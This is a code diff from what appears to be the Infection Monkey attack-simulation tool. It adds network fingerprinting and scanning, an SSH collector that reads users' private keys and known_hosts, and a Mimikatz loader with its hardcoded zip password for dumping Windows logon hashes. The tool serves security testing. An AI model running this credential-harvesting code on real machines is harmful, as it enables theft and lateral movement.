+        routes.append((socket.htonl(long(dst, 16)) & 0xffffffff,
+                       socket.htonl(long(msk, 16)) & 0xffffffff,
                       socket.inet_ntoa(struct.pack("I", long(gw, 16))),
                       iff, ifaddr))

View File

@ -0,0 +1,82 @@
import logging
import socket
from model.host import VictimHost
from network import HostFinger
__author__ = 'Maor Rayzin'
LOG = logging.getLogger(__name__)
class MSSQLFinger(HostFinger):
# Class related consts
SQL_BROWSER_DEFAULT_PORT = 1434
BUFFER_SIZE = 4096
TIMEOUT = 5
SERVICE_NAME = 'MSSQL'
def __init__(self):
self._config = __import__('config').WormConfiguration
def get_host_fingerprint(self, host):
"""Gets Microsoft SQL Server instance information by querying the SQL Browser service.
:arg:
            host (VictimHost): The MSSQL server to query for information.
:returns:
Discovered server information written to the Host info struct.
True if success, False otherwise.
"""
assert isinstance(host, VictimHost)
        # Create a UDP socket and set a timeout
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(self.TIMEOUT)
server_address = (str(host.ip_addr), self.SQL_BROWSER_DEFAULT_PORT)
# The message is a CLNT_UCAST_EX packet to get all instances
# https://msdn.microsoft.com/en-us/library/cc219745.aspx
message = '\x03'
        # Encode the message as bytes
message = message.encode()
# send data and receive response
try:
LOG.info('Sending message to requested host: {0}, {1}'.format(host, message))
sock.sendto(message, server_address)
data, server = sock.recvfrom(self.BUFFER_SIZE)
except socket.timeout:
            LOG.info('Socket timeout reached; the SQL Browser service on host {0} probably does not exist'.format(host))
sock.close()
return False
except socket.error as e:
if e.errno == socket.errno.ECONNRESET:
LOG.info('Connection was forcibly closed by the remote host. The host: {0} is rejecting the packet.'
.format(host))
else:
LOG.error('An unknown socket error occurred while trying the mssql fingerprint, closing socket.',
exc_info=True)
sock.close()
return False
host.services[self.SERVICE_NAME] = {}
# Loop through the server data
instances_list = data[3:].decode().split(';;')
LOG.info('{0} MSSQL instances found'.format(len(instances_list)))
for instance in instances_list:
instance_info = instance.split(';')
if len(instance_info) > 1:
host.services[self.SERVICE_NAME][instance_info[1]] = {}
for i in range(1, len(instance_info), 2):
                    # Each instance's info is nested under its own name, so when there are
                    # multiple instances each one gets its own entry
host.services[self.SERVICE_NAME][instance_info[1]][instance_info[i - 1]] = instance_info[i]
# Close the socket
sock.close()
return True
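For reference, a worked example of the parsing loop above on a made-up SQL Browser reply (real replies use the same semicolon-delimited key/value layout):
# Illustrative only; the reply string is fabricated
sample = 'ServerName;MYSRV;InstanceName;SQLEXPRESS;IsClustered;No;Version;14.0.1000.169;tcp;1433'
fields = sample.split(';')
parsed = {fields[1]: {fields[i - 1]: fields[i] for i in range(1, len(fields), 2)}}
# parsed == {'MYSRV': {'ServerName': 'MYSRV', 'InstanceName': 'SQLEXPRESS',
#                      'IsClustered': 'No', 'Version': '14.0.1000.169', 'tcp': '1433'}}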

View File

@ -36,8 +36,32 @@ class NetworkScanner(object):
        self._ranges = [NetworkRange.get_range_obj(address_str=x) for x in WormConfiguration.subnet_scan_list]
        if WormConfiguration.local_network_scan:
            self._ranges += get_interfaces_ranges()
        self._ranges += self._get_inaccessible_subnets_ips()
        LOG.info("Base local networks to scan are: %r", self._ranges)
def _get_inaccessible_subnets_ips(self):
"""
For each of the machine's IPs, checks if it's in one of the subnets specified in the
'inaccessible_subnets' config value. If so, all other subnets in the config value shouldn't be accessible.
All these subnets are returned.
:return: A list of subnets that shouldn't be accessible from the machine the monkey is running on.
"""
subnets_to_scan = []
if len(WormConfiguration.inaccessible_subnets) > 1:
for subnet_str in WormConfiguration.inaccessible_subnets:
if NetworkScanner._is_any_ip_in_subnet([unicode(x) for x in self._ip_addresses], subnet_str):
# If machine has IPs from 2 different subnets in the same group, there's no point checking the other
# subnet.
for other_subnet_str in WormConfiguration.inaccessible_subnets:
if other_subnet_str == subnet_str:
continue
if not NetworkScanner._is_any_ip_in_subnet([unicode(x) for x in self._ip_addresses],
other_subnet_str):
subnets_to_scan.append(NetworkRange.get_range_obj(other_subnet_str))
break
return subnets_to_scan
    def get_victim_machines(self, scan_type, max_find=5, stop_callback=None):
        assert issubclass(scan_type, HostScanner)
@ -76,3 +100,10 @@ class NetworkScanner(object):
            if SCAN_DELAY:
                time.sleep(SCAN_DELAY)
@staticmethod
def _is_any_ip_in_subnet(ip_addresses, subnet_str):
for ip_address in ip_addresses:
if NetworkRange.get_range_obj(subnet_str).is_in_range(ip_address):
return True
return False
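To make the segmentation check concrete, here is a minimal standalone sketch (stdlib ipaddress, made-up addresses; not code from this commit) of the rule implemented above: if any local IP falls inside one configured subnet, every other configured subnet becomes a scan target.
import ipaddress
local_ips = [u'10.0.0.5']
inaccessible_subnets = [u'10.0.0.0/24', u'11.0.0.2/32', u'12.2.3.0/24']
def in_subnet(ips, subnet):
    net = ipaddress.ip_network(subnet, strict=False)
    return any(ipaddress.ip_address(ip) in net for ip in ips)
to_scan = [other for subnet in inaccessible_subnets if in_subnet(local_ips, subnet)
           for other in inaccessible_subnets if other != subnet and not in_subnet(local_ips, other)]
# to_scan == [u'11.0.0.2/32', u'12.2.3.0/24'] -- successful connections into these ranges indicate a
# segmentation violation and are shown in the report.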

View File

@ -144,13 +144,13 @@ class SMBFinger(HostFinger):
                host.os['type'] = 'linux'
            host.services[SMB_SERVICE]['name'] = service_client
-            if not host.os.has_key('version'):
+            if 'version' not in host.os:
                host.os['version'] = os_version
            else:
                host.services[SMB_SERVICE]['os-version'] = os_version
            return True
-        except Exception, exc:
+        except Exception as exc:
            LOG.debug("Error getting smb fingerprint: %s", exc)
        return False

View File

@ -2,7 +2,7 @@ from itertools import izip_longest
from random import shuffle
from network import HostScanner, HostFinger
-from network.tools import check_tcp_ports
+from network.tools import check_tcp_ports, tcp_port_to_service
__author__ = 'itamar'
@ -31,7 +31,7 @@ class TcpScanner(HostScanner, HostFinger):
        ports, banners = check_tcp_ports(host.ip_addr, target_ports, self._config.tcp_scan_timeout / 1000.0,
                                         self._config.tcp_scan_get_banner)
        for target_port, banner in izip_longest(ports, banners, fillvalue=None):
-            service = 'tcp-' + str(target_port)
+            service = tcp_port_to_service(target_port)
            host.services[service] = {}
            if banner:
                host.services[service]['banner'] = banner

View File

@ -8,6 +8,7 @@ DEFAULT_TIMEOUT = 10
BANNER_READ = 1024
LOG = logging.getLogger(__name__)
SLEEP_BETWEEN_POLL = 0.5
def struct_unpack_tracker(data, index, fmt):
@ -126,15 +127,24 @@ def check_tcp_ports(ip, ports, timeout=DEFAULT_TIMEOUT, get_banner=False):
LOG.warning("Failed to connect to port %s, error code is %d", port, err) LOG.warning("Failed to connect to port %s, error code is %d", port, err)
if len(possible_ports) != 0: if len(possible_ports) != 0:
time.sleep(timeout) timeout = int(round(timeout)) # clamp to integer, to avoid checking input
sock_objects = [s[1] for s in possible_ports] time_left = timeout
# first filter sockets_to_try = possible_ports[:]
_, writeable_sockets, _ = select.select(sock_objects, sock_objects, sock_objects, 0) connected_ports_sockets = []
for s in writeable_sockets: while (time_left >= 0) and len(sockets_to_try):
try: # actual test sock_objects = [s[1] for s in sockets_to_try]
connected_ports_sockets.append((s.getpeername()[1], s))
except socket.error: # bad socket, select didn't filter it properly _, writeable_sockets, _ = select.select(sock_objects, sock_objects, sock_objects, 0)
pass for s in writeable_sockets:
try: # actual test
connected_ports_sockets.append((s.getpeername()[1], s))
except socket.error: # bad socket, select didn't filter it properly
pass
sockets_to_try = [s for s in sockets_to_try if s not in connected_ports_sockets]
if sockets_to_try:
time.sleep(SLEEP_BETWEEN_POLL)
timeout -= SLEEP_BETWEEN_POLL
LOG.debug( LOG.debug(
"On host %s discovered the following ports %s" % "On host %s discovered the following ports %s" %
(str(ip), ",".join([str(s[0]) for s in connected_ports_sockets]))) (str(ip), ",".join([str(s[0]) for s in connected_ports_sockets])))
@ -154,3 +164,7 @@ def check_tcp_ports(ip, ports, timeout=DEFAULT_TIMEOUT, get_banner=False):
    except socket.error as exc:
        LOG.warning("Exception when checking ports on host %s, Exception: %s", str(ip), exc)
        return [], []
def tcp_port_to_service(port):
return 'tcp-' + str(port)
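The new loop replaces the single fixed sleep with repeated select() passes until the timeout budget is spent. A standalone sketch of the same pattern (stdlib only; poll_ports and its arguments are illustrative names, not part of this commit):
import select
import socket
import time
def poll_ports(ip, ports, timeout=3, poll_interval=0.5):
    socks = []
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.setblocking(False)
        s.connect_ex((ip, port))  # returns immediately; completion is detected later via select()
        socks.append(s)
    connected = []
    while timeout >= 0 and socks:
        _, writable, _ = select.select(socks, socks, socks, 0)
        for s in writable:
            try:
                connected.append(s.getpeername()[1])  # getpeername() fails if the connect did not succeed
            except socket.error:
                pass
        socks = [s for s in socks if s not in writable]
        if socks:
            time.sleep(poll_interval)
            timeout -= poll_interval
    return connected
# e.g. poll_ports('10.0.0.5', [22, 80, 443]) returns the subset of ports that accepted a connection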

View File

@ -0,0 +1,25 @@
import os
import sys
__author__ = 'itay.mizeretz'
def get_binaries_dir_path():
"""
Gets the path to the binaries dir (files packaged in pyinstaller if it was used, infection_monkey dir otherwise)
:return: Binaries dir path
"""
if getattr(sys, 'frozen', False):
return sys._MEIPASS
else:
return os.path.dirname(os.path.abspath(__file__))
def get_binary_file_path(filename):
"""
Gets the path to a binary file
:param filename: name of the file
:return: Path to file
"""
return os.path.join(get_binaries_dir_path(), filename)

View File

@ -70,4 +70,9 @@ Sambacry requires two standalone binaries to execute remotely.
Mimikatz is required for the Monkey to be able to steal credentials on Windows. It's possible to either compile from sources (requires Visual Studio 2013 and up) or download the binaries from
https://github.com/guardicore/mimikatz/releases/tag/1.0.0
-Download both 32 and 64 bit DLLs and place them under [code location]\infection_monkey\bin
+Download both 32 and 64 bit zipped DLLs and place them under [code location]\infection_monkey\bin
Alternatively, if you build Mimikatz, put each version in a zip file.
1. The zip should contain only the Mimikatz DLL named tmpzipfile123456.dll
2. It should be protected using the password 'VTQpsJPXgZuXhX6x3V84G'.
3. The zip file should be named mk32.zip/mk64.zip accordingly.
4. Zipping with 7zip has been tested. Other zipping software may not work.
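A quick way to sanity-check the result (an illustrative Python snippet, not part of the build; it assumes the 32-bit zip was produced exactly as described above and uses classic ZipCrypto so the stdlib can read it):
import zipfile
with zipfile.ZipFile('mk32.zip') as zf:
    assert zf.namelist() == ['tmpzipfile123456.dll']
    zf.extract('tmpzipfile123456.dll', pwd=b'VTQpsJPXgZuXhX6x3V84G')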

View File

@ -10,8 +10,7 @@ odict
paramiko
psutil==3.4.2
PyInstaller
six
ecdsa
netifaces
-mock
-nose
ipaddress

View File

@ -0,0 +1,96 @@
import logging
import pwd
import os
import glob
__author__ = 'VakarisZ'
LOG = logging.getLogger(__name__)
class SSHCollector(object):
"""
SSH keys and known hosts collection module
"""
default_dirs = ['/.ssh/', '/']
@staticmethod
def get_info():
LOG.info("Started scanning for ssh keys")
home_dirs = SSHCollector.get_home_dirs()
ssh_info = SSHCollector.get_ssh_files(home_dirs)
LOG.info("Scanned for ssh keys")
return ssh_info
@staticmethod
def get_ssh_struct(name, home_dir):
"""
:return: SSH info struct with these fields:
name: username of user, for whom the keys belong
home_dir: users home directory
        public_key: contents of the *.pub file (public key)
        private_key: contents of the matching private key file
        known_hosts: contents of the known_hosts file (all the servers the keys are good for,
        possibly hashed)
"""
return {'name': name, 'home_dir': home_dir, 'public_key': None,
'private_key': None, 'known_hosts': None}
@staticmethod
def get_home_dirs():
root_dir = SSHCollector.get_ssh_struct('root', '')
home_dirs = [SSHCollector.get_ssh_struct(x.pw_name, x.pw_dir) for x in pwd.getpwall()
if x.pw_dir.startswith('/home')]
home_dirs.append(root_dir)
return home_dirs
@staticmethod
def get_ssh_files(usr_info):
for info in usr_info:
path = info['home_dir']
for directory in SSHCollector.default_dirs:
if os.path.isdir(path + directory):
try:
current_path = path + directory
# Searching for public key
if glob.glob(os.path.join(current_path, '*.pub')):
# Getting first file in current path with .pub extension(public key)
public = (glob.glob(os.path.join(current_path, '*.pub'))[0])
LOG.info("Found public key in %s" % public)
try:
with open(public) as f:
info['public_key'] = f.read()
# By default private key has the same name as public, only without .pub
private = os.path.splitext(public)[0]
if os.path.exists(private):
try:
with open(private) as f:
                                # an encrypted private key is of no use to us
private_key = f.read()
if private_key.find('ENCRYPTED') == -1:
info['private_key'] = private_key
LOG.info("Found private key in %s" % private)
else:
continue
except (IOError, OSError):
pass
# By default known hosts file is called 'known_hosts'
known_hosts = os.path.join(current_path, 'known_hosts')
if os.path.exists(known_hosts):
try:
with open(known_hosts) as f:
info['known_hosts'] = f.read()
LOG.info("Found known_hosts in %s" % known_hosts)
except (IOError, OSError):
pass
# If private key found don't search more
if info['private_key']:
break
except (IOError, OSError):
pass
except OSError:
pass
usr_info = [info for info in usr_info if info['private_key'] or info['known_hosts']
or info['public_key']]
return usr_info

View File

@ -1,6 +1,7 @@
import logging
from . import InfoCollector
from SSH_info_collector import SSHCollector
__author__ = 'uri'
@ -26,4 +27,6 @@ class LinuxInfoCollector(InfoCollector):
        self.get_process_list()
        self.get_network_info()
        self.get_azure_info()
        self.info['ssh_info'] = SSHCollector.get_info()
        return self.info

View File

@ -2,6 +2,9 @@ import binascii
import ctypes
import logging
import socket
import zipfile
from pyinstaller_utils import get_binary_file_path, get_binaries_dir_path
__author__ = 'itay.mizeretz'
@ -13,18 +16,36 @@ class MimikatzCollector(object):
    Password collection module for Windows using Mimikatz.
    """
-    def __init__(self):
-        try:
-            self._isInit = False
-            self._config = __import__('config').WormConfiguration
-            self._dll = ctypes.WinDLL(self._config.mimikatz_dll_name)
+    # Name of Mimikatz DLL. Must be name of file in Mimikatz zip.
+    MIMIKATZ_DLL_NAME = 'tmpzipfile123456.dll'
+    # Name of ZIP containing Mimikatz. Must be identical to one on monkey.spec
+    MIMIKATZ_ZIP_NAME = 'tmpzipfile123456.zip'
+    # Password to Mimikatz zip file
+    MIMIKATZ_ZIP_PASSWORD = r'VTQpsJPXgZuXhX6x3V84G'
+    def __init__(self):
+        self._config = __import__('config').WormConfiguration
+        self._isInit = False
+        self._dll = None
+        self._collect = None
+        self._get = None
+        self.init_mimikatz()
+    def init_mimikatz(self):
+        try:
+            with zipfile.ZipFile(get_binary_file_path(MimikatzCollector.MIMIKATZ_ZIP_NAME), 'r') as mimikatz_zip:
+                mimikatz_zip.extract(self.MIMIKATZ_DLL_NAME, path=get_binaries_dir_path(),
+                                     pwd=self.MIMIKATZ_ZIP_PASSWORD)
+            self._dll = ctypes.WinDLL(get_binary_file_path(self.MIMIKATZ_DLL_NAME))
            collect_proto = ctypes.WINFUNCTYPE(ctypes.c_int)
            get_proto = ctypes.WINFUNCTYPE(MimikatzCollector.LogonData)
            self._collect = collect_proto(("collect", self._dll))
            self._get = get_proto(("get", self._dll))
            self._isInit = True
-        except StandardError:
+        except Exception:
            LOG.exception("Error initializing mimikatz collector")
    def get_logon_info(self):
@ -71,7 +92,7 @@ class MimikatzCollector(object):
logon_data_dictionary[username]["ntlm_hash"] = ntlm_hash logon_data_dictionary[username]["ntlm_hash"] = ntlm_hash
return logon_data_dictionary return logon_data_dictionary
except StandardError: except Exception:
LOG.exception("Error getting logon info") LOG.exception("Error getting logon info")
return {} return {}

View File

@ -15,6 +15,7 @@ class WindowsInfoCollector(InfoCollector):
    def __init__(self):
        super(WindowsInfoCollector, self).__init__()
        self._config = __import__('config').WormConfiguration
    def get_info(self):
        """
@ -28,7 +29,13 @@ class WindowsInfoCollector(InfoCollector):
        self.get_process_list()
        self.get_network_info()
        self.get_azure_info()
-        mimikatz_collector = MimikatzCollector()
-        mimikatz_info = mimikatz_collector.get_logon_info()
-        self.info["credentials"].update(mimikatz_info)
+        self._get_mimikatz_info()
        return self.info
def _get_mimikatz_info(self):
if self._config.should_use_mimikatz:
LOG.info("Using mimikatz")
self.info["credentials"].update(MimikatzCollector().get_logon_info())
else:
LOG.info("Not using mimikatz")

View File

@ -1,45 +0,0 @@
# -*- coding: UTF-8 -*-
# NOTE: Launch all tests with `nosetests` command from infection_monkey dir.
import json
import unittest
from mock import Mock, patch
import control
from config import GUID
class ReportConfigErrorTestCase(unittest.TestCase):
"""
When unknown config variable received form the island server, skip it and report config
error back to the server.
"""
config_response = Mock(json=Mock(return_value={'config': {'blah': 'blah'}}))
def teardown(self):
patch.stopall()
def test_config(self):
patch('control.requests.patch', Mock()).start()
patch('control.WormConfiguration', Mock(current_server='127.0.0.1:123')).start()
# GIVEN the server with uknown config variable
patch('control.requests.get', Mock(return_value=self.config_response)).start()
# WHEN monkey tries to load config from server
control.ControlClient.load_control_config()
# THEN she reports config error back to the server
control.requests.patch.assert_called_once_with(
"https://127.0.0.1:123/api/monkey/%s" % GUID,
data=json.dumps({'config_error': True}),
headers={'content-type': 'application/json'},
verify=False,
proxies=control.ControlClient.proxies)
if __name__ == '__main__':
unittest.main()

View File

@ -1,4 +1,3 @@
-from ftp import FTPServer
-from http import HTTPServer
+from http import HTTPServer, LockedHTTPServer
__author__ = 'hoffer'

View File

@ -1,174 +0,0 @@
import socket, threading, time
import StringIO
__author__ = 'hoffer'
class FTPServer(threading.Thread):
def __init__(self, local_ip, local_port, files):
self.files=files
self.cwd='/'
self.mode='I'
self.rest=False
self.pasv_mode=False
self.local_ip = local_ip
self.local_port = local_port
threading.Thread.__init__(self)
def run(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.bind((self.local_ip,self.local_port))
self.sock.listen(1)
self.conn, self.addr = self.sock.accept()
self.conn.send('220 Welcome!\r\n')
while True:
if 0 == len(self.files):
break
cmd=self.conn.recv(256)
if not cmd: break
else:
try:
func=getattr(self,cmd[:4].strip().upper())
func(cmd)
except Exception,e:
self.conn.send('500 Sorry.\r\n')
break
self.conn.close()
self.sock.close()
def SYST(self,cmd):
self.conn.send('215 UNIX Type: L8\r\n')
def OPTS(self,cmd):
if cmd[5:-2].upper()=='UTF8 ON':
self.conn.send('200 OK.\r\n')
else:
self.conn.send('451 Sorry.\r\n')
def USER(self,cmd):
self.conn.send('331 OK.\r\n')
def PASS(self,cmd):
self.conn.send('230 OK.\r\n')
def QUIT(self,cmd):
self.conn.send('221 Goodbye.\r\n')
def NOOP(self,cmd):
self.conn.send('200 OK.\r\n')
def TYPE(self,cmd):
self.mode=cmd[5]
self.conn.send('200 Binary mode.\r\n')
def CDUP(self,cmd):
self.conn.send('200 OK.\r\n')
def PWD(self,cmd):
self.conn.send('257 \"%s\"\r\n' % self.cwd)
def CWD(self,cmd):
self.conn.send('250 OK.\r\n')
def PORT(self,cmd):
if self.pasv_mode:
self.servsock.close()
self.pasv_mode = False
l = cmd[5:].split(',')
self.dataAddr='.'.join(l[:4])
self.dataPort=(int(l[4])<<8)+int(l[5])
self.conn.send('200 Get port.\r\n')
def PASV(self,cmd):
self.pasv_mode = True
self.servsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.servsock.bind((local_ip,0))
self.servsock.listen(1)
ip, port = self.servsock.getsockname()
self.conn.send('227 Entering Passive Mode (%s,%u,%u).\r\n' %
(','.join(ip.split('.')), port>>8&0xFF, port&0xFF))
def start_datasock(self):
if self.pasv_mode:
self.datasock, addr = self.servsock.accept()
else:
self.datasock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.datasock.connect((self.dataAddr,self.dataPort))
def stop_datasock(self):
self.datasock.close()
if self.pasv_mode:
self.servsock.close()
def LIST(self,cmd):
self.conn.send('150 Here comes the directory listing.\r\n')
self.start_datasock()
for fn in self.files.keys():
k=self.toListItem(fn)
self.datasock.send(k+'\r\n')
self.stop_datasock()
self.conn.send('226 Directory send OK.\r\n')
def toListItem(self,fn):
fullmode='rwxrwxrwx'
mode = ''
d = '-'
ftime=time.strftime(' %b %d %H:%M ', time.gmtime())
return d+fullmode+' 1 user group '+str(self.files[fn].tell())+ftime+fn
def MKD(self,cmd):
self.conn.send('257 Directory created.\r\n')
def RMD(self,cmd):
self.conn.send('450 Not allowed.\r\n')
def DELE(self,cmd):
self.conn.send('450 Not allowed.\r\n')
def SIZE(self,cmd):
self.conn.send('450 Not allowed.\r\n')
def RNFR(self,cmd):
self.conn.send('350 Ready.\r\n')
def RNTO(self,cmd):
self.conn.send('250 File renamed.\r\n')
def REST(self,cmd):
self.pos=int(cmd[5:-2])
self.rest=True
self.conn.send('250 File position reseted.\r\n')
def RETR(self,cmd):
fn = cmd[5:-2]
if self.mode=='I':
fi=self.files[fn]
else:
fi=self.files[fn]
self.conn.send('150 Opening data connection.\r\n')
if self.rest:
fi.seek(self.pos)
self.rest=False
data= fi.read(1024)
self.start_datasock()
while data:
self.datasock.send(data)
data=fi.read(1024)
fi.close()
del self.files[fn]
self.stop_datasock()
self.conn.send('226 Transfer complete.\r\n')
def STOR(self,cmd):
fn = cmd[5:-2]
fo = StringIO.StringIO()
self.conn.send('150 Opening data connection.\r\n')
self.start_datasock()
while True:
data=self.datasock.recv(1024)
if not data: break
fo.write(data)
fo.seek(0)
self.stop_datasock()
self.conn.send('226 Transfer complete.\r\n')

View File

@ -6,6 +6,7 @@ import threading
import urllib
from logging import getLogger
from urlparse import urlsplit
from threading import Lock
import monkeyfs
from base import TransportProxyBase, update_last_serve_time
@ -122,7 +123,7 @@ class HTTPConnectProxyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
        address = (u.hostname, u.port or 443)
        try:
            conn = socket.create_connection(address)
-        except socket.error, e:
+        except socket.error as e:
            LOG.debug("HTTPConnectProxyHandler: Got exception while trying to connect to %s: %s" % (repr(address), e))
            self.send_error(504)  # 504 Gateway Timeout
            return
@ -183,6 +184,49 @@ class HTTPServer(threading.Thread):
        self.join(timeout)
class LockedHTTPServer(threading.Thread):
"""
    Same as HTTPServer (used for file downloads), just with a lock to avoid race conditions.
    You create a lock instance and pass it to this server's constructor, then acquire the lock
    before starting the server and again right after. Once the server starts it releases the lock,
    so the second acquire only returns when the server is up. That way subsequent code always
    talks to an HTTP server that is already running.
"""
# Seconds to wait until server stops
STOP_TIMEOUT = 5
def __init__(self, local_ip, local_port, filename, lock, max_downloads=1):
self._local_ip = local_ip
self._local_port = local_port
self._filename = filename
self.max_downloads = max_downloads
self.downloads = 0
self._stopped = False
self.lock = lock
threading.Thread.__init__(self)
self.daemon = True
def run(self):
class TempHandler(FileServHTTPRequestHandler):
filename = self._filename
@staticmethod
def report_download(dest=None):
LOG.info('File downloaded from (%s,%s)' % (dest[0], dest[1]))
self.downloads += 1
httpd = BaseHTTPServer.HTTPServer((self._local_ip, self._local_port), TempHandler)
self.lock.release()
while not self._stopped and self.downloads < self.max_downloads:
httpd.handle_request()
self._stopped = True
def stop(self, timeout=STOP_TIMEOUT):
self._stopped = True
self.join(timeout)
class HTTPConnectProxy(TransportProxyBase):
    def run(self):
        httpd = BaseHTTPServer.HTTPServer((self.local_host, self.local_port), HTTPConnectProxyHandler)
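A minimal sketch of the intended LockedHTTPServer handshake (addresses, port and filename are illustrative; this mirrors _start_http_server() in the WebLogic exploiter above): acquire the lock, start the server, then block on a second acquire that only returns once run() has released the lock, i.e. once the server exists and is serving.
import threading
lock = threading.Lock()
httpd = LockedHTTPServer('10.0.0.1', 8080, '/tmp/monkey.sh', lock)  # example arguments
lock.acquire()
httpd.start()
lock.acquire()  # released by run() right after the server is created, so we only proceed once it's up
# ... trigger the download on the victim here ...
httpd.stop()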

View File

@ -63,7 +63,7 @@ class TcpProxy(TransportProxyBase):
                try:
                    dest = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    dest.connect((self.dest_host, self.dest_port))
-                except socket.error, ex:
+                except socket.error as ex:
                    source.close()
                    dest.close()
                    continue

View File

@ -29,3 +29,4 @@ def is_64bit_python():
def is_windows_os():
    return sys.platform.startswith("win")

View File

@ -14,6 +14,7 @@ from cc.resources.client_run import ClientRun
from cc.resources.edge import Edge
from cc.resources.local_run import LocalRun
from cc.resources.log import Log
from cc.resources.island_logs import IslandLog
from cc.resources.monkey import Monkey
from cc.resources.monkey_configuration import MonkeyConfiguration
from cc.resources.monkey_download import MonkeyDownload
@ -104,5 +105,6 @@ def init_app(mongo_url):
    api.add_resource(Report, '/api/report', '/api/report/')
    api.add_resource(TelemetryFeed, '/api/telemetry-feed', '/api/telemetry-feed/')
    api.add_resource(Log, '/api/log', '/api/log/')
    api.add_resource(IslandLog, '/api/log/island/download', '/api/log/island/download/')
    return app

View File

@ -1,7 +1,11 @@
import json
import logging
import standard
import aws
logger = logging.getLogger(__name__)
ENV_DICT = {
    'standard': standard.StandardEnvironment,
    'aws': aws.AwsEnvironment
@ -18,6 +22,7 @@ def load_env_from_file():
try:
    __env_type = load_env_from_file()
    env = ENV_DICT[__env_type]()
    logger.info('Monkey\'s env is: {0}'.format(env.__class__.__name__))
except Exception:
-    print('Failed initializing environment: %s' % __env_type)
+    logger.error('Failed initializing environment', exc_info=True)
    raise

View File

@ -0,0 +1,26 @@
import os
import json
import logging.config
__author__ = 'Maor.Rayzin'
def json_setup_logging(default_path='logging.json', default_level=logging.INFO, env_key='LOG_CFG'):
"""
Setup the logging configuration
:param default_path: the default log configuration file path
:param default_level: Default level to log from
:param env_key: SYS ENV key to use for external configuration file path
:return:
"""
path = default_path
value = os.getenv(env_key, None)
if value:
path = value
if os.path.exists(path):
with open(path, 'rt') as f:
config = json.load(f)
logging.config.dictConfig(config)
else:
logging.basicConfig(level=default_level)

View File

@ -0,0 +1,33 @@
{
"version": 1,
"disable_existing_loggers": false,
"formatters": {
"simple": {
"format": "%(asctime)s - %(filename)s:%(lineno)s - %(funcName)10s() - %(levelname)s - %(message)s"
}
},
"handlers": {
"console": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "simple",
"stream": "ext://sys.stdout"
},
"info_file_handler": {
"class": "logging.handlers.RotatingFileHandler",
"level": "INFO",
"formatter": "simple",
"filename": "info.log",
"maxBytes": 10485760,
"backupCount": 20,
"encoding": "utf8"
}
},
"root": {
"level": "INFO",
"handlers": ["console", "info_file_handler"]
}
}

View File

@ -2,19 +2,30 @@ from __future__ import print_function # In python 2.7
import os
import sys
import time
import logging
BASE_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
PARENT_PATH = os.path.dirname(BASE_PATH)
if PARENT_PATH not in sys.path:
    sys.path.insert(0, PARENT_PATH)
if BASE_PATH not in sys.path:
    sys.path.insert(0, BASE_PATH)
from cc.island_logger import json_setup_logging
# This is here in order to catch EVERYTHING; some functions are called on import, so the log init needs to be on top.
json_setup_logging(default_path='island_logger_default_config.json', default_level=logging.DEBUG)
logger = logging.getLogger(__name__)
from cc.app import init_app
from cc.utils import local_ip_addresses
from cc.environment.environment import env
from cc.database import is_db_server_up
-if __name__ == '__main__':
+def main():
    from tornado.wsgi import WSGIContainer
    from tornado.httpserver import HTTPServer
    from tornado.ioloop import IOLoop
@ -22,7 +33,7 @@ if __name__ == '__main__':
    mongo_url = os.environ.get('MONGO_URL', env.get_mongo_url())
    while not is_db_server_up(mongo_url):
-        print('Waiting for MongoDB server')
+        logger.info('Waiting for MongoDB server')
        time.sleep(1)
    app = init_app(mongo_url)
@ -33,6 +44,10 @@ if __name__ == '__main__':
                             ssl_options={'certfile': os.environ.get('SERVER_CRT', 'server.crt'),
                                          'keyfile': os.environ.get('SERVER_KEY', 'server.key')})
    http_server.listen(env.get_island_port())
-    print('Monkey Island Server is running on https://{}:{}'.format(local_ip_addresses()[0], env.get_island_port()))
+    logger.info(
+        'Monkey Island Server is running on https://{}:{}'.format(local_ip_addresses()[0], env.get_island_port()))
    IOLoop.instance().start()
if __name__ == '__main__':
    main()

View File

@ -1,3 +1,4 @@
import logging
from flask import request, jsonify
import flask_restful
@ -5,6 +6,8 @@ from cc.services.node import NodeService
__author__ = 'itay.mizeretz'
logger = logging.getLogger(__name__)
class ClientRun(flask_restful.Resource):
    def get(self):
@ -17,6 +20,7 @@ class ClientRun(flask_restful.Resource):
        if monkey is not None:
            is_monkey_running = not monkey["dead"]
        else:
            logger.info("Monkey is not running")
            is_monkey_running = False
        return jsonify(is_running=is_monkey_running)

View File

@ -0,0 +1,19 @@
import logging
import flask_restful
from cc.auth import jwt_required
from cc.services.island_logs import IslandLogService
__author__ = "Maor.Rayzin"
logger = logging.getLogger(__name__)
class IslandLog(flask_restful.Resource):
@jwt_required()
def get(self):
try:
return IslandLogService.get_log_file()
except Exception as e:
logger.error('Monkey Island logs failed to download', exc_info=True)

View File

@ -13,6 +13,8 @@ from cc.utils import local_ip_addresses
__author__ = 'Barak'
import logging
logger = logging.getLogger(__name__)
def run_local_monkey():
    import platform
@ -32,6 +34,7 @@ def run_local_monkey():
        copyfile(monkey_path, target_path)
        os.chmod(target_path, stat.S_IRWXU | stat.S_IRWXG)
    except Exception as exc:
        logger.error('Copy file failed', exc_info=True)
        return False, "Copy file failed: %s" % exc
    # run the monkey
@ -41,6 +44,7 @@ def run_local_monkey():
        args = "".join(args)
        pid = subprocess.Popen(args, shell=True).pid
    except Exception as exc:
        logger.error('popen failed', exc_info=True)
        return False, "popen failed: %s" % exc
    return True, "pis: %s" % pid

View File

@ -17,7 +17,7 @@ class MonkeyConfiguration(flask_restful.Resource):
    @jwt_required()
    def post(self):
        config_json = json.loads(request.data)
-        if config_json.has_key('reset'):
+        if 'reset' in config_json:
            ConfigService.reset_config()
        else:
            ConfigService.update_config(config_json, should_encrypt=True)

View File

@ -1,3 +1,4 @@
import logging
import json
import os
@ -6,6 +7,8 @@ import flask_restful
__author__ = 'Barak'
logger = logging.getLogger(__name__)
MONKEY_DOWNLOADS = [
    {
@ -18,6 +21,11 @@ MONKEY_DOWNLOADS = [
        'machine': 'i686',
        'filename': 'monkey-linux-32',
    },
{
'type': 'linux',
'machine': 'i386',
'filename': 'monkey-linux-32',
},
    {
        'type': 'linux',
